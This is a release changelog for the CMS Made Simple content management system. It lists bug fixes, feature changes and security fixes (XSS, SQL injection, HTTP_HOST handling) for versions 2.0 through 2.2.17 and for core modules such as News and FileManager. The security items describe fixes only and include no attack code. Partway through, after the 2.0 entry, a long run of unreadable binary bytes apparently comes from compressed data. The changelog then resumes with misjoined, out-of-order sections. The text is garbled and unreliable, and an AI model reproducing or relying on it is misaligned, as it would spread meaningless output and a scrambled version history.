  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
�
�Z�r[G�}�W��Q��7�E�=ђf,y��Ȫ�"aak\��������9���̪�̳�����~����ͯ�/����7:8tN1�����_~����^����O߾1�B��W?��p������,���<�����{��kw��mV?���w�|����7-kl$k��Vl�)�rs�E��x1[�'����6_/ַ��(��6�$��}MN�l�9�\9�r�Y�֧!�E��o�76-fG�S��Cf���A6��2����&嚄��$�Ql %�(~�W7�!�	9Q���̥Z�BR������������Vhf7��X6���s!�Y�!�"))��0�\�r�,:�R�iL8"'ܼ�(.6�[N�(�2��f6Z�"�1�.��Z�Z��Z'��m���J��4v�R�t�8%���|��I���MI	Y;��K�����ai��,���<j/���-2;���m��Þ�φ�����F&�EjRMלuu!�(8��8[Y�紕ᩁ��a0�ȐM)ـyB����\}jF�`e��(^�z�=rV���R��F��J���xnoe�`��r9��U��a�}.����/���LɜS`r��a�d��([�>
q���*]VX�"l�)���ΕW���=�������ݽ�8țd��I�IgH�\��vK��0��R�͡圊-^$U]LJ�hV�1�fUV���kl��jt���v��?�����>[�|;��I�Z�n��r)T�\��lh���\�9�����b�'Z��Z6��������hA7bAɒ)��a���D?��j���j�َ�.�[���	�V��>
h]b�^�v��>�cSkS��\-�R����55;���+ޡ�N�֬''bc�V��Ei�:�1~"^]�u�l��{��D����E�6iK�T"��l��י��JېΤ2�,�UR �ƚe���-�|���e=�-�qR4�W�m�,
N1Ԛԉؗ]'�(+,�:@ncK17�^
�fe"�C�YX�DlU$�4��Te�/��j'�u�{~�̘&cZe�,�%�j��=g�4�AE������˹	A���1��=m�� ��Z.���	�U0H�6�s,�e�J����m?�����C�x��f`�RD'��[-x��.يLG_|�5��(	�Ն�|I�M�8��*QE6��q���Û%͟P��������e[�dcä�s��y��I�,D��I�@�wV�M�.:��Ss�� ���^Š cT�I��_��z���m�Y�k%g��@f�����b3I�!?����[ֳp��B�;Ԟh18���~�����{��p�����}��);@%P�'2G��V�#�bjO���
uza�Ur�,D��.��`F|M72�*t-�R3X�j�АYr�ћ`���i���!�~�$�)��R��ZW�Z�-)��aJ*�=w#Pa|�9:WMZ��BS`�!�ձ�
,
�D�m68�Q��cyp+F9��t�5A�LG��b��t�ke𠢒[Lt8@[�gv��������`iYcXb̡�yq0hem��qv#;��ޭ{`uR�hr	�ׅ��f�F�F4jͣ����[����sH���A$3��yMC=�Pve�10D�3#��Z�m��7
�(и{�vC�a�'��h��
���.���׳����p�K��1h���Z�)@V;k�s`z� �!���!�*)@7PU�l���?U���u�,���Wtw�{X��ύ��Ti��8Y�NM��5ɏb�Gi7��!שL��%m3��u= ��P�{X=���Y5�\ᥒ �pF��2A<Zӷ4��w�8���"ӽ,��G�
�1xF�=Ξ��88�e�e�Z���tF�9eX�H�ac�V�Mf�6�N��!!B��^"���C��!ѱ���n�� �e�4��*D������w��=u^c�'V[,��/�x�'�B7V[ؾ6�0��Cg|$p��p$�C)q�Ev.�̳�3���&�|J'h��HF`+�*A��R�����^��|���ЀǪVH�n�|�E1�V�2��jppJG�/d���5ƨ�)v_��&[��#�e�T�ɂX���Ɋ�R�J�3��9��]1f{��|>��5��<�j��b$#��
:�4����phNo|0�	#J<V�u	�V!Ə�f�绱�@K��A� ��_�c;JR�_K8�\\��е��j�����'}����Ü��+Ct*��7V�'sɐ9%O(�_�2NrD'	�QM<{��'��΂�":��Q��үl�E��5�_��*���%7N��D=�(����_Gx��I�wj9�b�M�:z�C��������q�fe7���V%���C�f��ǣ�L5�/:�d<^�����<����.����Up�N5�6�6�W䩫��s[q����l	B�Q�KAYC
�^^�bj+DpZ$��IA�@
��u���y��o�#�v��ޘ~5�-;�
�
<C&��ߌH3���5�R0?�l^�G5��E:�U����d�#�B�c�m�#��R6��L�"�NY�J�±�m[�N`�Wd�W��6�͋�΋6����`�
��M�Mq>�N��5(� �iɣ��1��X^�e�}=*�M	`�@9D�؎IC��_��,�l��K�bF��|�`~�BK�t����5%@7`��~�0:�
8�ǒs�P
�2+U�آR~!0<�����(�[ Q���%�C�[���~���!
=��a�o���zlh}�Uh�&���͠k�p,?����-F.�4K�JC��X9�̕�QT�T�GAw�F��R�DŽ߻Sݪ���.^�DF}�ņgw�^��joJRJ���bp.[�2�
��f��կ=Ť�	M�I ?��ԎJ��تsT��Ǿ��%��L��y�t��l![ɡ���0C|�-�D_��x�|A�_�0;1)
{X
:2�`e}�����^�~C��!�٣��p�$��Q�(�}�<�in��U>y96��U��@q,Y��&�E����:��^��=�@�5-e>b1W2�@�����mZ�/Լ<�32�wa1�6�@=7X
U�i^<�%Y���>ÙP�e�'�)N�P�D]C��nW�߀��p��,N�P|T������T>�_�ڮQ�t�Z7��QW�vh�qM��{x��b)�0����Q��?���]���T<l���S%��3�Rɷq��mde�`�}�<l�€�,�?h?����Y’Z�lc\!�J�8�Ԓ�T�l��>��|��
�˷Ie���VQ�I:��@���0�T��>���6�9�~���N�}`"X��sa'��Z����U0����J
5(���\��)늀(�� �9E�����n񙈻�D�jtv�߭d͑�6����AS��\���mtE�Cjn�)��W,�E��ƻs���lDL�f^���삖d�Q}�p.�]���Ȼ����b�[Ql�@�-�N�D>�`ot�>_U���c`"� ��/Ʀ��r�ЀjQ�iz�=�G�𘉕`���[�dr���8�yRk\<|k������'CMS Made Simple Version 2.2.16
------------------------------
NOTE: Although all efforts have been made to make this release compatible with PHP8, you may experience issues in some server environments, so testing is highly recommended before switching PHP versions on a production site.
NOTE: Most likely not all 3rd Party modules are compatible either so, if you find issues with theses modules, please file BR with the respective module developers.
NOTE: We have dropped support to PHP 5.6 in this release. The minimum PHP version now supported is 7.0 although we strongly recommend 7.4+ for security and performance.Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
